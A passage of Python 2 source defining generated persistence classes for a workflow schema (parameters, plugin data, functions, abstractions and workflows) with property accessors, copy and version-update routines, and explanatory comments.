new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_pos(self):
return self._db_pos
def __set_db_pos(self, pos):
self._db_pos = pos
self.is_dirty = True
db_pos = property(__get_db_pos, __set_db_pos)
def db_add_pos(self, pos):
self._db_pos = pos
def db_change_pos(self, pos):
self._db_pos = pos
def db_delete_pos(self, pos):
self._db_pos = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_type(self):
return self._db_type
def __set_db_type(self, type):
self._db_type = type
self.is_dirty = True
db_type = property(__get_db_type, __set_db_type)
def db_add_type(self, type):
self._db_type = type
def db_change_type(self, type):
self._db_type = type
def db_delete_type(self, type):
self._db_type = None
def __get_db_val(self):
return self._db_val
def __set_db_val(self, val):
self._db_val = val
self.is_dirty = True
db_val = property(__get_db_val, __set_db_val)
def db_add_val(self, val):
self._db_val = val
def db_change_val(self, val):
self._db_val = val
def db_delete_val(self, val):
self._db_val = None
def __get_db_alias(self):
return self._db_alias
def __set_db_alias(self, alias):
self._db_alias = alias
self.is_dirty = True
db_alias = property(__get_db_alias, __set_db_alias)
def db_add_alias(self, alias):
self._db_alias = alias
def db_change_alias(self, alias):
self._db_alias = alias
def db_delete_alias(self, alias):
self._db_alias = None
def getPrimaryKey(self):
return self._db_id
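# DBPluginData carries an opaque data string on behalf of third-party
# plugins; the schema itself does not interpret it.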
class DBPluginData(object):
vtType = 'plugin_data'
def __init__(self, id=None, data=None):
self._db_id = id
self._db_data = data
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPluginData.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPluginData(id=self._db_id,
data=self._db_data)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# set flags (no indices to recreate here)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPluginData()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'data' in class_dict:
res = class_dict['data'](old_obj, trans_dict)
new_obj.db_data = res
elif hasattr(old_obj, 'db_data') and old_obj.db_data is not None:
new_obj.db_data = old_obj.db_data
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_data(self):
return self._db_data
def __set_db_data(self, data):
self._db_data = data
self.is_dirty = True
db_data = property(__get_db_data, __set_db_data)
def db_add_data(self, data):
self._db_data = data
def db_change_data(self, data):
self._db_data = data
def db_delete_data(self, data):
self._db_data = None
def getPrimaryKey(self):
return self._db_id
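# DBFunction groups an ordered list of DBParameter children under a port
# name, with the usual id index mirroring the list. A hypothetical
# construction sketch:
#
#     f = DBFunction(id=3, pos=0, name='value')
#     f.db_add_parameter(DBParameter(id=4, pos=0, type='String', val='x'))
#     assert f.db_has_parameter_with_id(4)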
class DBFunction(object):
vtType = 'function'
def __init__(self, id=None, pos=None, name=None, parameters=None):
self._db_id = id
self._db_pos = pos
self._db_name = name
self.db_deleted_parameters = []
self.db_parameters_id_index = {}
if parameters is None:
self._db_parameters = []
else:
self._db_parameters = parameters
for v in self._db_parameters:
self.db_parameters_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBFunction.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBFunction(id=self._db_id,
pos=self._db_pos,
name=self._db_name)
if self._db_parameters is None:
cp._db_parameters = []
else:
cp._db_parameters = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_parameters]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_parameters_id_index = dict((v.db_id, v) for v in cp._db_parameters)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBFunction()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'pos' in class_dict:
res = class_dict['pos'](old_obj, trans_dict)
new_obj.db_pos = res
elif hasattr(old_obj, 'db_pos') and old_obj.db_pos is not None:
new_obj.db_pos = old_obj.db_pos
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'parameters' in class_dict:
res = class_dict['parameters'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_parameter(obj)
elif hasattr(old_obj, 'db_parameters') and old_obj.db_parameters is not None:
for obj in old_obj.db_parameters:
new_obj.db_add_parameter(DBParameter.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_parameters') and hasattr(new_obj, 'db_deleted_parameters'):
for obj in old_obj.db_deleted_parameters:
n_obj = DBParameter.update_version(obj, trans_dict)
new_obj.db_deleted_parameters.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_parameters:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_parameter(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_parameters)
if remove:
self.db_deleted_parameters = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_parameters:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_pos(self):
return self._db_pos
def __set_db_pos(self, pos):
self._db_pos = pos
self.is_dirty = True
db_pos = property(__get_db_pos, __set_db_pos)
def db_add_pos(self, pos):
self._db_pos = pos
def db_change_pos(self, pos):
self._db_pos = pos
def db_delete_pos(self, pos):
self._db_pos = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_parameters(self):
return self._db_parameters
def __set_db_parameters(self, parameters):
self._db_parameters = parameters
self.is_dirty = True
db_parameters = property(__get_db_parameters, __set_db_parameters)
def db_get_parameters(self):
return self._db_parameters
def db_add_parameter(self, parameter):
self.is_dirty = True
self._db_parameters.append(parameter)
self.db_parameters_id_index[parameter.db_id] = parameter
def db_change_parameter(self, parameter):
self.is_dirty = True
found = False
for i in xrange(len(self._db_parameters)):
if self._db_parameters[i].db_id == parameter.db_id:
self._db_parameters[i] = parameter
found = True
break
if not found:
self._db_parameters.append(parameter)
self.db_parameters_id_index[parameter.db_id] = parameter
def db_delete_parameter(self, parameter):
self.is_dirty = True
for i in xrange(len(self._db_parameters)):
if self._db_parameters[i].db_id == parameter.db_id:
if not self._db_parameters[i].is_new:
self.db_deleted_parameters.append(self._db_parameters[i])
del self._db_parameters[i]
break
del self.db_parameters_id_index[parameter.db_id]
def db_get_parameter(self, key):
for i in xrange(len(self._db_parameters)):
if self._db_parameters[i].db_id == key:
return self._db_parameters[i]
return None
def db_get_parameter_by_id(self, key):
return self.db_parameters_id_index[key]
def db_has_parameter_with_id(self, key):
return key in self.db_parameters_id_index
def getPrimaryKey(self):
return self._db_id
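# DBAbstraction describes a subworkflow module: the identification fields
# (name, namespace, package, version, internal_version, tag) together
# with the same location/functions/annotations children an ordinary
# module carries.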
class DBAbstraction(object):
vtType = 'abstraction'
def __init__(self, id=None, cache=None, name=None, namespace=None, package=None, version=None, internal_version=None, tag=None, location=None, functions=None, annotations=None):
self._db_id = id
self._db_cache = cache
self._db_name = name
self._db_namespace = namespace
self._db_package = package
self._db_version = version
self._db_internal_version = internal_version
self._db_tag = tag
self.db_deleted_location = []
self._db_location = location
self.db_deleted_functions = []
self.db_functions_id_index = {}
if functions is None:
self._db_functions = []
else:
self._db_functions = functions
for v in self._db_functions:
self.db_functions_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAbstraction.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAbstraction(id=self._db_id,
cache=self._db_cache,
name=self._db_name,
namespace=self._db_namespace,
package=self._db_package,
version=self._db_version,
internal_version=self._db_internal_version,
tag=self._db_tag)
if self._db_location is not None:
cp._db_location = self._db_location.do_copy(new_ids, id_scope, id_remap)
if self._db_functions is None:
cp._db_functions = []
else:
cp._db_functions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_functions]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_functions_id_index = dict((v.db_id, v) for v in cp._db_functions)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAbstraction()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'cache' in class_dict:
res = class_dict['cache'](old_obj, trans_dict)
new_obj.db_cache = res
elif hasattr(old_obj, 'db_cache') and old_obj.db_cache is not None:
new_obj.db_cache = old_obj.db_cache
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'internal_version' in class_dict:
res = class_dict['internal_version'](old_obj, trans_dict)
new_obj.db_internal_version = res
elif hasattr(old_obj, 'db_internal_version') and old_obj.db_internal_version is not None:
new_obj.db_internal_version = old_obj.db_internal_version
if 'tag' in class_dict:
res = class_dict['tag'](old_obj, trans_dict)
new_obj.db_tag = res
elif hasattr(old_obj, 'db_tag') and old_obj.db_tag is not None:
new_obj.db_tag = old_obj.db_tag
if 'location' in class_dict:
res = class_dict['location'](old_obj, trans_dict)
new_obj.db_location = res
elif hasattr(old_obj, 'db_location') and old_obj.db_location is not None:
obj = old_obj.db_location
new_obj.db_add_location(DBLocation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_location') and hasattr(new_obj, 'db_deleted_location'):
for obj in old_obj.db_deleted_location:
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_location.append(n_obj)
if 'functions' in class_dict:
res = class_dict['functions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_function(obj)
elif hasattr(old_obj, 'db_functions') and old_obj.db_functions is not None:
for obj in old_obj.db_functions:
new_obj.db_add_function(DBFunction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_functions') and hasattr(new_obj, 'db_deleted_functions'):
for obj in old_obj.db_deleted_functions:
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_functions.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_location is not None:
children.extend(self._db_location.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_location = None
to_del = []
for child in self.db_functions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_function(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_location)
children.extend(self.db_deleted_functions)
children.extend(self.db_deleted_annotations)
if remove:
self.db_deleted_location = []
self.db_deleted_functions = []
self.db_deleted_annotations = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_location is not None and self._db_location.has_changes():
return True
for child in self._db_functions:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_cache(self):
return self._db_cache
def __set_db_cache(self, cache):
self._db_cache = cache
self.is_dirty = True
db_cache = property(__get_db_cache, __set_db_cache)
def db_add_cache(self, cache):
self._db_cache = cache
def db_change_cache(self, cache):
self._db_cache = cache
def db_delete_cache(self, cache):
self._db_cache = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_internal_version(self):
return self._db_internal_version
def __set_db_internal_version(self, internal_version):
self._db_internal_version = internal_version
self.is_dirty = True
db_internal_version = property(__get_db_internal_version, __set_db_internal_version)
def db_add_internal_version(self, internal_version):
self._db_internal_version = internal_version
def db_change_internal_version(self, internal_version):
self._db_internal_version = internal_version
def db_delete_internal_version(self, internal_version):
self._db_internal_version = None
def __get_db_tag(self):
return self._db_tag
def __set_db_tag(self, tag):
self._db_tag = tag
self.is_dirty = True
db_tag = property(__get_db_tag, __set_db_tag)
def db_add_tag(self, tag):
self._db_tag = tag
def db_change_tag(self, tag):
self._db_tag = tag
def db_delete_tag(self, tag):
self._db_tag = None
def __get_db_location(self):
return self._db_location
def __set_db_location(self, location):
self._db_location = location
self.is_dirty = True
db_location = property(__get_db_location, __set_db_location)
def db_add_location(self, location):
self._db_location = location
def db_change_location(self, location):
self._db_location = location
def db_delete_location(self, location):
if not self.is_new:
self.db_deleted_location.append(self._db_location)
self._db_location = None
def __get_db_functions(self):
return self._db_functions
def __set_db_functions(self, functions):
self._db_functions = functions
self.is_dirty = True
db_functions = property(__get_db_functions, __set_db_functions)
def db_get_functions(self):
return self._db_functions
def db_add_function(self, function):
self.is_dirty = True
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_change_function(self, function):
self.is_dirty = True
found = False
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
self._db_functions[i] = function
found = True
break
if not found:
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_delete_function(self, function):
self.is_dirty = True
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
if not self._db_functions[i].is_new:
self.db_deleted_functions.append(self._db_functions[i])
del self._db_functions[i]
break
del self.db_functions_id_index[function.db_id]
def db_get_function(self, key):
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == key:
return self._db_functions[i]
return None
def db_get_function_by_id(self, key):
return self.db_functions_id_index[key]
def db_has_function_with_id(self, key):
return key in self.db_functions_id_index
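# The collection accessors above pair a linear scan (db_get_function) with
# an O(1) index lookup (db_get_function_by_id). Note that
# db_delete_function deletes from db_functions_id_index unconditionally
# after the scan, so passing a function whose id is not in the index
# raises KeyError rather than failing silently.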
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
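# DBWorkflow mirrors the persisted 'workflow' entity: id-indexed
# collections of modules, connections, annotations, plugin_datas and
# 'others', plus scalar metadata (name, version, last_modified,
# vistrail_id). A minimal construction sketch, assuming `m` and `c` are
# hypothetical DBModule and DBConnection instances with ids already set:
#
#     wf = DBWorkflow(id=1, name='example')
#     wf.db_add_module(m)
#     wf.db_add_connection(c)
#     assert wf.db_has_module_with_id(m.db_id)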
class DBWorkflow(object):
vtType = 'workflow'
def __init__(self, modules=None, id=None, entity_type=None, name=None, version=None, last_modified=None, connections=None, annotations=None, plugin_datas=None, others=None, vistrail_id=None):
self.db_deleted_modules = []
self.db_modules_id_index = {}
if modules is None:
self._db_modules = []
else:
self._db_modules = modules
for v in self._db_modules:
self.db_modules_id_index[v.db_id] = v
self._db_id = id
self._db_entity_type = entity_type
self._db_name = name
self._db_version = version
self._db_last_modified = last_modified
self.db_deleted_connections = []
self.db_connections_id_index = {}
if connections is None:
self._db_connections = []
else:
self._db_connections = connections
for v in self._db_connections:
self.db_connections_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_plugin_datas = []
self.db_plugin_datas_id_index = {}
if plugin_datas is None:
self._db_plugin_datas = []
else:
self._db_plugin_datas = plugin_datas
for v in self._db_plugin_datas:
self.db_plugin_datas_id_index[v.db_id] = v
self.db_deleted_others = []
self.db_others_id_index = {}
if others is None:
self._db_others = []
else:
self._db_others = others
for v in self._db_others:
self.db_others_id_index[v.db_id] = v
self._db_vistrail_id = vistrail_id
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBWorkflow.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBWorkflow(id=self._db_id,
entity_type=self._db_entity_type,
name=self._db_name,
version=self._db_version,
last_modified=self._db_last_modified,
vistrail_id=self._db_vistrail_id)
if self._db_modules is None:
cp._db_modules = []
else:
cp._db_modules = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_modules]
if self._db_connections is None:
cp._db_connections = []
else:
cp._db_connections = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_connections]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_plugin_datas is None:
cp._db_plugin_datas = []
else:
cp._db_plugin_datas = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_plugin_datas]
if self._db_others is None:
cp._db_others = []
else:
cp._db_others = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_others]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_vistrail_id') and ('vistrail', self._db_vistrail_id) in id_remap:
cp._db_vistrail_id = id_remap[('vistrail', self._db_vistrail_id)]
# recreate indices and set flags
cp.db_modules_id_index = dict((v.db_id, v) for v in cp._db_modules)
cp.db_connections_id_index = dict((v.db_id, v) for v in cp._db_connections)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_plugin_datas_id_index = dict((v.db_id, v) for v in cp._db_plugin_datas)
cp.db_others_id_index = dict((v.db_id, v) for v in cp._db_others)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
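# do_copy deep-copies the workflow and, when new_ids is True, allocates
# fresh ids from id_scope and records every (type, old_id) -> new_id
# translation in the caller-supplied id_remap, so cross-references such as
# vistrail_id can be patched as seen above. A minimal usage sketch,
# assuming an id_scope object with the getNewId()/remap interface used
# here:
#
#     id_remap = {}
#     cp = wf.do_copy(new_ids=True, id_scope=id_scope, id_remap=id_remap)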
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBWorkflow()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'modules' in class_dict:
res = class_dict['modules'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module(obj)
elif hasattr(old_obj, 'db_modules') and old_obj.db_modules is not None:
for obj in old_obj.db_modules:
if obj.vtType == 'module':
new_obj.db_add_module(DBModule.update_version(obj, trans_dict))
elif obj.vtType == 'abstraction':
new_obj.db_add_module(DBAbstraction.update_version(obj, trans_dict))
elif obj.vtType == 'group':
new_obj.db_add_module(DBGroup.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_modules') and hasattr(new_obj, 'db_deleted_modules'):
for obj in old_obj.db_deleted_modules:
if obj.vtType == 'module':
n_obj = DBModule.update_version(obj, trans_dict)
new_obj.db_deleted_modules.append(n_obj)
elif obj.vtType == 'abstraction':
n_obj = DBAbstraction.update_version(obj, trans_dict)
new_obj.db_deleted_modules.append(n_obj)
elif obj.vtType == 'group':
n_obj = DBGroup.update_version(obj, trans_dict)
new_obj.db_deleted_modules.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'connections' in class_dict:
res = class_dict['connections'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_connection(obj)
elif hasattr(old_obj, 'db_connections') and old_obj.db_connections is not None:
for obj in old_obj.db_connections:
new_obj.db_add_connection(DBConnection.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_connections') and hasattr(new_obj, 'db_deleted_connections'):
for obj in old_obj.db_deleted_connections:
n_obj = DBConnection.update_version(obj, trans_dict)
new_obj.db_deleted_connections.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'plugin_datas' in class_dict:
res = class_dict['plugin_datas'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_plugin_data(obj)
elif hasattr(old_obj, 'db_plugin_datas') and old_obj.db_plugin_datas is not None:
for obj in old_obj.db_plugin_datas:
new_obj.db_add_plugin_data(DBPluginData.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_plugin_datas') and hasattr(new_obj, 'db_deleted_plugin_datas'):
for obj in old_obj.db_deleted_plugin_datas:
n_obj = DBPluginData.update_version(obj, trans_dict)
new_obj.db_deleted_plugin_datas.append(n_obj)
if 'others' in class_dict:
res = class_dict['others'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_other(obj)
elif hasattr(old_obj, 'db_others') and old_obj.db_others is not None:
for obj in old_obj.db_others:
new_obj.db_add_other(DBOther.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_others') and hasattr(new_obj, 'db_deleted_others'):
for obj in old_obj.db_deleted_others:
n_obj = DBOther.update_version(obj, trans_dict)
new_obj.db_deleted_others.append(n_obj)
if 'vistrail_id' in class_dict:
res = class_dict['vistrail_id'](old_obj, trans_dict)
new_obj.db_vistrail_id = res
